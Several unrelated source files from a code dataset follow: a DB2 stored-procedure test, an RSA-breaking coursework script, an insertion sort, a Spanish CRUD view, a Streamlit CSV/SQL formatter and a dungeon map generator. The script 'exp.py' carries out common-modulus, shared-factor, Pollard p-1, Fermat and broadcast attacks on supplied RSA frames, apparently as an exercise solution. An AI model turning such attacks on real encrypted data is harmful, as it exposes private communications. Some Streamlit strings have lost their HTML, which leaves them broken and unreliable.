DBMS_OUTPUT.PUT_LINE(v_new_dept);\r\n IF v_one_char = 'A' THEN\r\n INSERT INTO \r\n department (deptno, deptname, admrdept, location) \r\n VALUES \r\n (v_new_dept, v_deptname, v_admdept, 'LA CALLE');\r\n END IF;\r\n\r\n END LOOP;\r\n\r\n CLOSE c1;\r\nEND\r\n@\r\n\r\n\r\n\"\"\".format(schema=self.getDB2_USER())\r\n if not self.if_table_present(self.conn, \"DEPARTMENT\", self.getDB2_USER()):\r\n mylog.warning(\"\"\"\r\nTable \"%s\".DEPARTMENT is not present we cant run register sp ITERATOR that depends on table DEPARTMENT\r\n\"\"\" % self.getDB2_USER())\r\n self.result.addSkip(self, \"Table DEPARTMENT is not present we cant register sp ITERATOR\")\r\n return 0\r\n ret = self.run_statement(sql_str)\r\n return ret\r\n\r\n def test_run_iterator(self):\r\n \"\"\"Test iterator\r\n \"\"\"\r\n if not self.if_routine_present(self.getDB2_USER(), \"ITERATOR\"):\r\n mylog.warning(\"ITERATOR sp is not present\")\r\n self.result.addSkip(self, \"ITERATOR sp is not present\")\r\n return 0\r\n try:\r\n stmt = ibm_db.callproc(self.conn, \"ITERATOR\" , ()) \r\n ibm_db.free_stmt(stmt)\r\n except Exception as e:\r\n self.result.addFailure(self, sys.exc_info()) \r\n return -1\r\n return 0\r\n","repo_name":"asierra01/ibm_db_test","sub_path":"ibm_db_test_cases/ibm_db_sp_iterator.py","file_name":"ibm_db_sp_iterator.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37506031056","text":"from Crypto.Util.number import getPrime , long_to_bytes,bytes_to_long\nfrom gmpy2 import invert , powmod , is_prime , gcd , next_prime , iroot\nfrom functools import reduce\nn = []\ne = []\nc = []\nm = {}\nsolved = []\n\ndef CRT(mi, ai):\n M = reduce(lambda x, y: x * y, mi)\n ai_ti_Mi = [a * (M // m) * invert(M // m, m) for (m, a) in zip(mi, ai)]\n return reduce(lambda x, y: x + y, ai_ti_Mi) % M\ndef small_e_boardcast_attack(nlist , e , clist):\n m = CRT(nlist , clist)\n tmp = iroot(m , e)\n if tmp[1] == 1:\n return tmp[0]\n else:\n return 0\n\ndef same_module_attack(N , e1 , e2 , c1 , c2):\n d1 = invert(e1 , e2)\n d2 = (d1 * e1 - 1) // e2\n true_c2 = invert(c2 , N)\n return (powmod(c1 , d1 , N) * powmod(true_c2 , d2 , N)) % N\ndef Pollard_p_1(N):\n a = 2\n f = a\n # precompute\n while 1:\n for n in range(1,200000):\n f = powmod(f, n, N)\n if is_prime(n):\n d = gcd(f-1, N)\n if 1 < d < N:\n return d , N//d\n elif d >= N:\n f = next_prime(a)\n break\n else:\n break\ndef Williams_p_1(N):\n def myplus(a , b , difference):\n return (a * b - difference) % N\n def myAverange(high, low ,difference):\n return ((low + high) * invert(difference , N)) % N\n def mymul(num , vn):\n num_bin = bin(num)[2:]\n lenth = len(num_bin)\n two_list = [vn]\n for i in range(lenth):\n temp = two_list[-1]\n two_list.append(myplus(temp , temp , 2))\n two_list.reverse()\n low = two_list[1]\n high = two_list[0]\n for i in range(1 , len(num_bin)):\n temp = myAverange(high , low , two_list[i+1])\n if num_bin[i] == '1':\n low = temp\n else:\n high = temp\n return low\n i = 2\n v = 15\n while 1:\n v = mymul(i , v)\n temp = gcd(v-2 , N)\n if 1 < temp < N:\n return temp , N // temp\n elif temp == N:\n return 0\n else:\n i += 1 \n if i > 100000:\n return 0\n\ndef _GetPlain(c):\n tmp = hex(c)[2:]\n if tmp[:16] != '9876543210abcdef':\n return 0\n number = int(tmp[16:24],16)\n plain = long_to_bytes(int(tmp[-16:] , 16))\n m[number] = plain\n return 1\ndef GetPlain(p , q , e , c):\n phi = (p-1)*(q-1)\n d = invert(e , phi)\n m = powmod(c , d , p*q)\n return _GetPlain(m)\n\ndef detect1():\n for i in range(21):\n for j in range(21):\n if i != j and n[i] == n[j] and e[i] != e[j]:\n tmp = _GetPlain(same_module_attack(n[i] , e[i],e[j],c[i],c[j]))\n if tmp == 1:\n solved.append(i)\n solved.append(j)\ndef detect2():\n for i in range(21):\n for j in range(21):\n if i != j:\n if 1 < gcd(n[i] , n[j]) < n[i]:\n p = gcd(n[i] , n[j])\n q1 = n[i] // p\n q2 = n[j] // p\n tmp1 = GetPlain(p , q1 , e[i],c[i])\n tmp2 = GetPlain(p , q2 , e[j],c[j])\n if tmp1 ==1:\n solved.append(i)\n if tmp2 == 1:\n solved.append(j)\n\ndef detect3():\n for i in range(21):\n if i not in solved:\n tmp = Pollard_p_1(n[i])\n if isinstance(tmp , tuple):\n p , q = tmp\n if GetPlain(p,q,e[i],c[i]):\n solved.append(i)\n\ndef detect4():\n for i in range(21):\n if i not in solved:\n p_q = iroot(n[i] , 2)[0]\n for _ in range(20000):\n p_q += 1\n if iroot(p_q**2 - n[i],2)[1] == 1:\n tmp = iroot(p_q**2 - n[i],2)[0]\n p = (p_q + tmp)\n q = (p_q - tmp)\n if GetPlain(p , q , e[i] , c[i]):\n solved.append(i)\n \ndef detect5():\n e = 5\n num = [3,8,12,16,20]\n nlist = [n[i] for i in num]\n clist = [c[i] for i in num]\n m = small_e_boardcast_attack(nlist , e ,clist)\n if _GetPlain(m):\n for i in num:\n solved.append(i)\ndef detect6():\n for i in range(21):\n if i not in solved:\n tmp = Williams_p_1(n[i])\n if isinstance(tmp , tuple):\n p , q = tmp\n if GetPlain(p,q,e[i],c[i]):\n solved.append(i)\n\n\n\nname = ['./data/Frame' + str(i) for i in range(21)]\nfor i in range(21):\n f = open(name[i] , 'r')\n data = f.read()\n tn , te , tc = int(data[:256] , 16) , int(data[256:512] , 16) , int(data[512:] , 16)\n n.append(tn)\n e.append(te)\n c.append(tc)\nnlist = []\nclist = []\nfor i in range(21):\n if e[i] == 3:\n nlist.append(n[i])\n clist.append(c[i])\n\ndetect1()#same module\ndetect2()#gcd attack\ndetect3()#pollard p-1\ndetect4()#Fermat attack\ndetect5()#broadcast attack\n#detect6()#william p+1\n\n\nm[2] = b'amous sa'\nm[3] = b'ying of '\nm[4] = b'Albert E'\n#coppersmith in e3.sage\n\nplain = b''\nprint(m)\nfor i in range(21):\n if i in m :\n plain += m[i]\n else:\n plain += b' '*8\nprint(plain)","repo_name":"Cor1e/Cryptography_task","sub_path":"task3/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18859521446","text":"def isertionSort(arr):\n for i in range(1,len(arr)):\n j=i-1\n temp=arr[i]\n while j>=0 and arr[j]>temp:\n arr[j+1]=arr[j]\n j-=1\n\n arr[j+1]=temp\n\nprint(\"Enter The Element Of The List Seprated By Space\")\narr=[int(x) for x in input().split()]\nisertionSort(arr)\nprint(\"Sorted List - \",arr)\n","repo_name":"DSC-ChitkaraUniv/HacktoberFest-2020","sub_path":"Coding/Python/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"33288565670","text":"class DestinoCulinarioView:\n def __init__(self, controller):\n self.controller = controller\n\n def crear_destino_culinario(self):\n id = int(input('Ingrese el ID del destino culinario: '))\n nombre = input('Ingrese el nombre del destino culinario: ')\n tipo_cocina = input('Ingrese el tipo de cocina: ')\n ingredientes = input('Ingrese los ingredientes (separados por comas): ').split(',')\n precio_minimo = float(input('Ingrese el precio mínimo: '))\n precio_maximo = float(input('Ingrese el precio máximo: '))\n popularidad = input('Ingrese la popularidad: ')\n disponibilidad = bool(input('Ingrese la disponibilidad (True/False): '))\n imagen = input('Ingrese la URL de la imagen: ')\n coord = input('Ingrese la URL de la imagen: ')\n direccion = input('Ingrese la URL de la imagen: ')\n\n self.controller.crear_item(id, nombre, tipo_cocina, ingredientes)\n print(f'Destino culinario creado con éxito.')\n\n def ver_destinos_culinarios(self):\n destinos_culinarios = self.controller.ver_items()\n for destino in destinos_culinarios:\n print(f\"ID: {destino['id']}, Nombre: {destino['nombre']}, Tipo de cocina: {destino['tipo_cocina']}\")\n\n def ver_destino_culinario_id(self, id_destino):\n return self.controller.ver_items_id(id_destino)\n\n def eliminar_destino_culinario(self):\n id_destino = int(input('Ingrese el ID del destino culinario que desea eliminar: '))\n self.controller.eliminar_item_id(id_destino)\n print('Destino culinario eliminado con éxito.')\n","repo_name":"carlos8788/FoodTravel","sub_path":"view/destino_culinario_view.py","file_name":"destino_culinario_view.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12218715754","text":"import streamlit as st\nimport pandas as pd\nimport base64\nimport datetime\nimport re\nimport io\nimport numpy as np\nimport time\nimport os\nimport csv\n\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxOptions\n\ndef download_file(sql_file):\n return st.download_button(\n label=\"DOWNLOAD!\",\n data=sql_file,\n file_name=sql_file.name.replace('.sql','_replaced.sql'),\n mime=\"text/plain\"\n )\ndef format_csv(df1,df_tp):\n # Perform some action to format the CSV file\n # For example, sort the dataframe by a specific column\n cols = df1.columns\n if 'Customer Name' in cols:\n df_tp['*ContactName'] = df1['Customer Name']\n else:\n st.write(f'Missing Customer Name')\n if not 'PO Number' in cols:\n # df_tp['InventoryItemCode'] = df1['PO Number']\n # else:\n st.write(f'Missing PO Number')\n if 'Primary Contact EmailID' in cols:\n df_tp['EmailAddress'] = df1['Primary Contact EmailID']\n else:\n st.write(f'Missing Primary Contact EmailID')\n \n if 'Customer Name' in cols:\n df_tp['Billing Address'] = df1['Billing Address']\n else:\n st.write(f'Missing Billing Address')\n if 'Billing City' in cols:\n df_tp['POCity'] = df1['Billing City']\n else:\n st.write(f'Missing Billing City')\n if 'Billing Country' in cols:\n df_tp['POCountry'] = df1['Billing Country']\n else:\n st.write(f'Missing Billing Country')\n if 'Invoice Number' in cols:\n # df_tp['*InvoiceNumber'] = df1.apply(lambda x: '# ' + x['Invoice Number'] if '#' not in x['Invoice Number'] else x['Invoice Number'], axis=1)\n df_tp['*InvoiceNumber'] = df1['Invoice Number']\n else:\n st.write(f'Missing Invoice Number')\n if 'CF.TGM #' in cols:\n df_tp['Reference'] = df1['CF.TGM #']\n else:\n st.write(f'Missing Reference')\n if 'Invoice Date' in cols:\n \n df_tp['*InvoiceDate'] = df1['Invoice Date']\n else:\n st.write(f'Missing Invoice Date')\n if 'Expected Payment Date' in cols:\n df_tp['*DueDate'] = df1['Expected Payment Date']\n else:\n st.write(f'Missing Expected Payment Date')\n if 'Total' in cols:\n df_tp['Total'] = df1['Total']\n else:\n st.write(f'Missing Total')\n if 'Item Desc' in cols:\n # df_tp['*Description'] = df1['Item Desc']\n df_tp['*Description'] = df1.apply(lambda x: x['Item Desc'] + '\\nPurchase Order: ' + str(x['PO Number']) if x['PO Number'] not in ['',np.nan] else x['Item Desc'],axis=1)\n # df_tp['*Description'] = df1['Item Desc'] + '\\nPurchase Order: ' + df1['PO Number']\n else:\n st.write(f'Missing Item Desc')\n if 'Quantity' in cols:\n df_tp['*Quantity'] = df1['Quantity']\n else:\n st.write(f'Missing Quantity')\n if 'Item Price' in cols:\n df_tp['*UnitAmount'] = df1['Item Price']\n else:\n st.write(f'Missing Item Price')\n if 'Discount' in cols:\n df_tp['Discount'] = df1['Discount']\n else:\n st.write(f'Missing Discount')\n if 'Account Code' in cols:\n df_tp['*AccountCode'] = df1['Account Code']\n else:\n st.write(f'Missing Account Code')\n if 'Item Tax Type' in cols:\n df_tp['*TaxType'] = df1['Item Tax Type']\n else:\n st.write(f'Missing Item Tax Type')\n df_tp['TaxAmount'] = 0\n if 'Currency Code' in cols:\n df_tp['Currency'] = df1['Currency Code']\n else:\n st.write(f'Missing Currency Code')\n # indexes = df_tp[df_tp['*InvoiceNumber'].duplicated()].index\n # count=0\n # for i in indexes:\n # new_text = str(df_tp['*InvoiceNumber'][i])+ '-'+ str(count)\n # df_tp.at[i,'*InvoiceNumber'] = new_text\n # count+=1\n \n return df_tp\ndef format_csv_contact(df_old,df_new):\n\n df_new['*ContactName'] = df_old['Contact Name']\n df_new['EmailAddress'] = df_old['EmailID']\n df_new['FirstName'] = df_old['First Name']\n df_new['LastName'] = df_old['Last Name']\n df_new['POAttentionTo'] = df_old['Billing Attention']\n df_new['POAddressLine1'] = df_old['Billing Address']\n df_new['POAddressLine2'] = df_old['Billing Street2']\n df_new['POCity'] = df_old['Billing City']\n df_new['POPostalCode'] = df_old['Billing Code']\n df_new['POCountry'] = df_old['Billing Country']\n df_new['PhoneNumber'] = df_old['Billing Phone']\n df_new['FaxNumber'] = df_old['Billing Fax']\n df_new['MobileNumber'] = df_old['MobilePhone']\n df_new['SkypeName'] = df_old['Skype Identity']\n df_new['TaxNumber'] = df_old['Tax Percentage']\n df_new = df_new.drop_duplicates(subset='*ContactName',keep=\"first\")\n return df_new\n\ndef format_excel(df):\n deal_created_count = 0\n deal_closed_count = 0\n for i in df.columns:\n my_series = df[i].dropna().to_list()\n if len(my_series)>0 and re.search('\\d\\d\\d\\d-\\d\\d-\\d\\d',str(my_series[0])) is not None:\n \n df[i] = pd.to_datetime(df[i],format='%Y/%m/%d',errors='coerce',yearfirst=True)\n if i == 'Deal - Deal created':\n deal_created_count+=1\n df['Created_month'] = df[i].astype('datetime64[ns]').dt.strftime('%m/%Y')\n df['Created_quater'] = df[i].astype('datetime64[ns]').dt.to_period('Q').dt.strftime('Q%q/%y')\n\n elif i == 'Deal - Deal closed on':\n deal_closed_count+=1\n df['Closed_month'] = df[i].astype('datetime64[ns]').dt.strftime('%m/%Y')\n df['Closed_quater'] = df[i].astype('datetime64[ns]').dt.to_period('Q').dt.strftime('Q%q/%y')\n\n df[i] = pd.to_datetime(df[i], format='%Y/%m/%d',errors='ignore').dt.date\n if deal_created_count==0:\n st.write(\"Couldn't find the column 'Deal - Deal created'\")\n elif deal_closed_count==0:\n st.write(\"Couldn't find the column 'Deal - Deal closed on'\")\n return df\n\ndef download_csv(df):\n # Create a downloadable link for the formatted CSV\n csv = df.to_csv(index=False)\n b64 = base64.b64encode(csv.encode()).decode()\n href = f'Download Formatted CSV File'\n st.markdown(href, unsafe_allow_html=True)\n\ndef download_excel(dataframe):\n # Convert the pandas DataFrame to an Excel file\n excel_file = io.BytesIO()\n with pd.ExcelWriter(excel_file, mode='xlsx', engine='openpyxl') as writer:\n dataframe.to_excel(writer, index=False)\n excel_file.seek(0)\n \n # Set the file name and type\n file_name = 'data_formatted.xlsx'\n file_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n \n # Create a button to download the file\n download_button_str = f\"Click here to download {file_name}!\"\n download_button = st.download_button(label=download_button_str, data=excel_file, file_name=file_name, mime=file_type)\n \n # Display the button\n st.write(download_button)\n\ndef set_bg_hack_url():\n '''\n A function to unpack an image from url and set as bg.\n Returns\n -------\n The background.\n '''\n \n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n )\ndef main():\n # set_bg_hack_url()\n st.image('https://vcdn1-giaitri.vnecdn.net/2023/05/18/deppcannes-1684376950-16843769-7808-2139-1684377768.jpg?w=500&h=300&q=100&dpr=2&fit=crop&s=LLzHRXv7WX6Rw8c-5je0Lg',caption=\"THANK YOU FOR YOUR SERVICE MR TAN\")\n \n\n tab1,tab2,tab3,tab4 = st.tabs([\"CSV Formatter - Invoices\",\"CSV Formatter - Contacts\",\"Excel Date Formatter\",\"DB Replacer\"])\n with tab1:\n st.title(\"CSV Format - Invoicessssssss\")\n # Upload CSV file\n uploaded_file = st.file_uploader(\"Upload CSV - invoice file\", type=\"csv\")\n uploaded_template = st.file_uploader(\"Upload CSV template - invoice file\", type=\"csv\")\n\n if uploaded_template is not None:\n template_df = pd.read_csv(uploaded_template,header=0)\n if uploaded_file is not None:\n df_file = pd.read_csv(uploaded_file,header=0)\n # Format button\n if st.button(\"Format\"):\n formatted_df = format_csv(df_file,template_df)\n\n # Display the formatted dataframe\n st.dataframe(formatted_df)\n\n # Download formatted CSV button\n download_csv(formatted_df)\n with tab2:\n st.title(\"CSV Formatter - Contacts\")\n # Upload CSV file\n uploaded_file2 = st.file_uploader(\"Upload CSV file - contact\", type=\"csv\")\n uploaded_template2 = st.file_uploader(\"Upload CSV template - contact file\", type=\"csv\")\n\n if uploaded_template2 is not None:\n template_df2 = pd.read_csv(uploaded_template2,header=0)\n if uploaded_file2 is not None:\n df_file2 = pd.read_csv(uploaded_file2,header=0)\n # Format button\n if st.button(\"Format\"):\n formatted_df2 = format_csv_contact(df_file2,template_df2)\n\n # Display the formatted dataframe\n st.dataframe(formatted_df2)\n\n # Download formatted CSV button\n download_csv(formatted_df2)\n with tab3:\n st.title(\"Excel Date Formatter\")\n uploaded_file1 = st.file_uploader(\"Upload Excel file\", type=\"xlsx\")\n if uploaded_file1 is not None:\n uploaded_file1_df = pd.read_excel(uploaded_file1,header=0)\n if st.button(\"Format\"):\n formatted_df1 = format_excel(uploaded_file1_df)\n\n # Display the formatted dataframe\n st.write(formatted_df1)\n\n # Download formatted CSV button\n download_excel(formatted_df1)\n with tab4:\n st.title(\"DB Replacer\")\n # Upload CSV file\n sql_file = st.file_uploader(\"Upload DB file\", type=\"sql\")\n uploaded_excel = st.file_uploader(\"Upload excel data\", type=\"xlsx\")\n \n if uploaded_excel is not None:\n try:\n excel = pd.read_excel(uploaded_excel,header=0,sheet_name='Sheet1')\n except:\n st.write('Please put data into sheet name \"Sheet1\" and try again.')\n if sql_file is not None:\n # with open(sql_file,'r') as file:\n sql_str = sql_file.read().decode('utf-8')\n # Format button\n if st.button(\"Format\"):\n progress_text = \"Replacing is in progress. Please wait.\"\n my_bar = st.progress(0.0, text=progress_text)\n start_time = time.time()\n new_excel = pd.melt(excel,id_vars = 'Alias',var_name='Find',value_name='Replace')\n new_excel['Alias'] = new_excel['Alias'].str.lower().str.replace('(','').str.replace(')','').str.replace(' ','-')\n new_excel = new_excel.sort_values(\"Alias\")\n df = new_excel.copy()\n df = df.reset_index(drop=True)\n df_report = df.copy()\n df_report['Status'] = ''\n status_text = st.empty()\n for index, row in df.iterrows():\n time.sleep(0.05)\n my_bar.progress((index+1)/len(df), text=progress_text)\n \n find = str(row['Find']).strip()\n replace = str(row['Replace']).replace('percent','%').strip()\n replace = replace.replace(\"'\",r\"\\'\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n # replace = replace.replace(\"'\",r\"\\'\").replace(\"/\",r\"\\/\").replace(\"/\",r\"\\/\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n if find == 'abc,def' and not replace == '-':\n replace = f'{int(replace):,}'\n dump = find.replace('$','\\$').replace('(','\\(').replace(')','\\)').replace('\\\\', r'\\\\').replace('\\/', r'/')\n alias = row['Alias'].strip()\n # if index%100==0:\n status_text.write(f'{index+1}/{len(df)}')\n # for i in range(2):\n result = re.subn(fr\"(?<={alias}).+{dump}(?=[^a-zA-Z])\",lambda x: x.group().replace(find,replace),sql_str)\n if not result[1]==0:\n \n sql_str = result[0]\n df_report.at[index,'Status'] = 'Sucess'\n else:\n df_report.at[index,'Status'] = 'Counld not find'\n time.sleep(1)\n my_bar.empty()\n st.write(\"--- %s minutes ---\" % ((time.time() - start_time)/60))\n with open(os.path.join(\"/tmp\", sql_file.name), \"w\") as f:\n f.write(sql_str)\n # sql_file.write(sql_str)\n # Download formatted CSV button\n download_file(sql_file)\n display_missing_df = df_report[df_report['Status']=='Counld not find']\n st.write(f'Report: {len(display_missing_df)} Could not find')\n st.dataframe(display_missing_df)\n st.write('Download Report:')\n download_excel(df_report)\n \n\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"TonyTanNguyen/fomatting_invoice","sub_path":"main_streamlit.py","file_name":"main_streamlit.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11508292030","text":"from tarterus.maparray import MapArray # , MapSquare\nfrom random import randint\nimport json\nfrom tarterus.engine import Engine\nimport io\n\nLOG = \"\"\n\ndef get_log():\n global LOG\n return LOG\n\n\ndef clear_log():\n global LOG\n LOG = \"\"\n\n\ndef add_log(txt):\n global LOG\n LOG = LOG + \"\\n\" + txt\n\n\ndef pop_section(maparray, mapset):\n section = mapset.pop()\n if section[0] == 'room':\n add_room(maparray, section, mapset)\n elif section[0] == 'hall':\n add_hall(maparray, section, mapset)\n\n\ndef empty(maparray, x, y, w, h):\n if x + w - 1 >= maparray.w or y + h - 1 >= maparray.h or x < 0 or y < 0:\n return False\n return all(s == ('void', 0) for s in maparray.squares(x, y, w, h))\n\n# TODO ROOM NUMBERS\n# TODO CHECK ROOM INTERSECTION\ndef add_room(maparray, section, mapset):\n add_log(\"add_room: {} {} {} {}\".format(*section))\n w = randint(1, 4) * 4 + 2\n h = randint(1, 4) * 4 + 2\n add_log(\"w = {}, h = {}\".format(w, h))\n x = 0\n y = 0\n doors = [False, False, False, False]\n for i in range(len(doors)):\n if randint(1, 2) == 2:\n doors[i] = True\n if section[1] == 'n':\n doors[2] = False\n y = section[3] - h + 1\n x = randint(section[2] - 3 * w // 4, section[2] - 1 * w // 4)\n elif section[1] == 'e':\n x = section[2]\n y = randint(section[3] - 3 * h // 4, section[3] - 1 * h // 4)\n doors[3] = False\n elif section[1] == 's':\n y = section[3]\n x = randint(section[2] - 3 * w // 4, section[2] - 1 * w // 4)\n doors[0] = False\n elif section[1] == 'w':\n x = section[2] - w + 1\n y = randint(section[3] - 3 * h // 4, section[3] - 1 * h // 4)\n doors[1] = False\n if not empty(maparray, x, y, w, h):\n return False\n maparray[x:x+w, y:y+h] = room(w, h, 0)\n add_log(\"room {}:{}, {}:{}\".format(x, x+w, y, y+h))\n maparray[section[2], section[3]] = ('door', 0)\n# TODO: NO DOORS IF HALL FAILS TO GENERATE (? WHERE TO PUT THAT CODE ?)\n if doors[0] is True:\n dx = randint(x + w // 4, x + 3 * w // 4)\n maparray[dx, y] = ('door', 0)\n mapset.add(('hall', 'n', dx, y - 1))\n if doors[1] is True:\n dy = randint(y + h // 4, y + 3 * h // 4)\n maparray[x + w - 1, dy] = ('door', 0)\n mapset.add(('hall', 'e', x + w, dy))\n if doors[2] is True:\n dx = randint(x + w // 4, x + 3 * w // 4)\n maparray[dx, y + h - 1] = ('door', 0)\n mapset.add(('hall', 's', dx, y + h))\n if doors[3] is True:\n dy = randint(y + h // 4, y + 3 * h // 4)\n maparray[x, dy] = ('door', 0)\n mapset.add(('hall', 'w', x - 1, dy))\n return False\n\n\n\ndef add_passage(maparray, section, mapset, r20_1, r20_2):\n pass\n\n\ndef add_hall(maparray, section, mapset):\n add_log(\"add_hall: {}, {}, {}, {}\".format(*section))\n l = randint(4,16)\n add_log(\"l = {}\".format(l))\n if section[1] == 'n':\n x = section[2]\n y = section[3]-l+1\n if not empty(maparray,x,y,1,l):\n return False\n maparray[x,y:y+l] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[2] + 16 < maparray.w:\n mapset.add(('hall', 'e', section[2] + 1,\n randint(section[3] - 3 * l // 4, section[3] - l // 4)))\n elif r == 8 and section[2] > 16:\n mapset.add(('hall', 'w', section[2] - 1,\n randint(section[3] - 3 * l // 4, section[3] - l // 4)))\n mapset.add(('room', 'n', x, y - 1))\n elif section[1] == 'e':\n x = section[2]\n y = section[3]\n if not empty(maparray, x, y, l, 1):\n return False\n maparray[x:x+l,y] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[3] + 16 < maparray.h:\n mapset.add(('hall', 's',\n randint(section[2] + l // 4, section[2] + 3 * l // 4), section[3] + l))\n elif r == 8 and section[3] > 16:\n mapset.add(('hall', 'n',\n randint(section[2] + l // 4, section[2] + 3 * l // 4),\n section[3]))\n mapset.add(('room', 'e', x+l, y))\n elif section[1] == 's':\n x = section[2]\n y = section[3]\n if not empty(maparray, x,y,1,l):\n return False\n maparray[x, y:y+l] = ('hall', 0)\n r = 1 # randint(1, 8)\n if r == 7 and section[2] + 16 < maparray.w:\n mapset.add(('hall', 'e', section[2] + 1,\n randint(section[3] + l // 4, section[3] + 3 * l // 4)))\n elif r == 8 and section[2] > 16:\n mapset.add(('hall', 'w', section[2] - 1,\n randint(section[3] + l // 4, section[3] + 3 * l // 4)))\n mapset.add(('room', 's', x, y+l))\n elif section[1] == 'w':\n x = section[2] - l + 1\n y = section[3]\n if not empty(maparray, x,y,l,1):\n return False\n maparray[x:x+l,y] = ('hall', 0)\n r = 1 # randint(1,8)\n if r == 7 and section[3] + 16 < maparray.h:\n mapset.add(('hall', 's',\n randint(section[2] - 3 * l // 4, section[2] - l // 4),\n section[3] + 1))\n elif r == 8 and section[3] > 16:\n mapset.add(('hall', 'n', \n randint(section[2] - 3 * l // 4, section[2] - l // 4), \n section[3] - 1))\n mapset.add(('room', 'w', x-1, y))\n return True\n\n\ndef room(w, h, rnum):\n mp = MapArray(('room', rnum), (w, h))\n mp[0:w:w-1, 1:h-1] = ('vwal', rnum)\n mp[1:w-1, 0:h:h-1] = ('hwal', rnum)\n mp[0:w:w-1, 0] = ('tcor', rnum)\n mp[0:w:w-1, h-1] = ('bcor', rnum)\n return mp\n\n\ndef gen_map(w, h, typ=\"default\"):\n maparray = MapArray(('void', 0), (w, h))\n x = maparray.w // 2\n y = 0\n mapset = set()\n add_hall(maparray, ('hall', 's', x, y), mapset)\n while len(mapset) > 0:\n pop_section(maparray, mapset)\n return (maparray, [{}])\n\ndef big_room(w, h):\n ma = MapArray(('void', 0), (w, h))\n rlist = [{}]\n x = 3\n y = 3\n rw = w - 6\n rh = h - 6\n ma[x:x+rw, y:y+rh] = room(rw, rh, 1)\n rlist.append({\"description\": \"BIG ROOM DADDY-O\"})\n return ma, rlist\n\n\ndef gen_splash(w, h):\n ma = MapArray(('void', 0), (w, h))\n topW = ma.w // 4 * 2\n botW = ma.w // 7\n topH = ma.h // 9\n botH = ma.h // 9 * 5\n topX = ma.w // 4\n botX = ma.w // 7 * 3\n dorX = ma.w // 2 - 1\n topY = ma.h // 9 * 2\n botY = ma.h // 9 * 3 - 1\n topR = room(topW, topH, 1)\n botR = room(botW, botH, 1)\n ma[topX:topX+topW, topY:topY+topH] = topR\n ma[botX:botX+botW, botY:botY+botH] = botR\n ma[dorX, botY] = ('door', 1)\n rlist = [{}]\n rlist.append({\"description\": \"\"\"

Tarterus

\n

© Carter Adams 2018

\"\"\"})\n return ma, rlist\n\n\ndef add_feature(ma, rlist, features):\n f = features.pop()\n rn = len(rlist)\n if f['type'] == 'passage':\n ln = randint(4, 10)\n x = f['x']\n y = f['y']\n d = f['d']\n for _ in range(ln):\n ma[x, y] = ('hall', rn)\n if d == 'e':\n x = x + 1\n elif d == 'w':\n x = x - 1\n elif d == 'n':\n y = y - 1\n elif d == 's':\n y = y + 1\n\n\ndef hall_test(w, h):\n ma = MapArray(('void', 0), (w, h))\n rlist = [{}]\n features = set({'type': 'passage', 'x': 1, 'y': h // 2, 'd': 'e'})\n while len(features) > 0:\n add_feature(ma, rlist, features)\n return ma, rlist\n\n\ndef gen_hall(x, y, d, ma, rn):\n ma[x:x+10, y] = ('hall', rn)\n\n\ndef label_to_n(label):\n TILETABLE = {\n 'void': 0,\n 'vwal': 1,\n 'hwal': 2,\n 'room': 3,\n 'hall': 4,\n 'tcor': 5,\n 'bcor': 6,\n 'door': 7,\n 'sdwn': 8,\n 'stup': 9,\n 'errr': 10,\n 'open': 11\n }\n try:\n return TILETABLE[label]\n except(KeyError):\n return 9\n\n\ndef maparray_to_json(ma, rlist, log):\n mp = []\n mnums = []\n add_log(\"end log.\")\n for c in range(ma.w):\n mp.append([])\n mnums.append([])\n for r in range(ma.h):\n mp[c].append(label_to_n(ma[c, r][0]))\n mnums[c].append(ma[c, r][1])\n return {\n \"mp\": mp,\n \"rnums\": mnums,\n \"rlist\": rlist,\n \"log\": log\n }\n\n\ndef fetch_map(w, h, typ=\"default\"):\n maparray = None\n roomlist = None\n clear_log()\n if typ == \"hall_test\":\n e = Engine({\"w\": w, \"h\": h, \"pop_mode\": \"random\"})\n e.add([\"start\", {\"origin\": \"m\"}])\n e.gen_map()\n maparray = e.maparray\n e.process_descriptions()\n roomlist = e.descriptions\n if typ == \"binary_test\":\n e = Engine({\"w\": w, \"h\": h, \"pop_mode\": \"random\"})\n e.add([\"start\", {\"origin\": \"m\"}])\n e.gen_map()\n return io.BytesIO(e.maparray.bytes())\n\n\n if typ == \"splash\":\n maparray, roomlist = gen_splash(w, h)\n add_log(\"fetch_map\")\n return json.dumps(maparray_to_json(maparray, roomlist, get_log()))\n\n\nif __name__ == \"__main__\":\n print(\"run tests or some shit\")\n","repo_name":"redcartel/tarterus-webclient","sub_path":"tarterus/mapgen.py","file_name":"mapgen.py","file_ext":"py","file_size_in_byte":8993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17682971871","text":"list_1 = [2, 4, 8]\nlist_2 = [1, 3, 2]\n\ndef combine(l1, l2):\n new_list = []\n for i in range(len(l1)):\n new_list.append(l1[i]+l2[i])\n return new_list\n\n# print(combine(list_1, list_2))\n\n\n# answer = 5 * 8\n# user_answer = 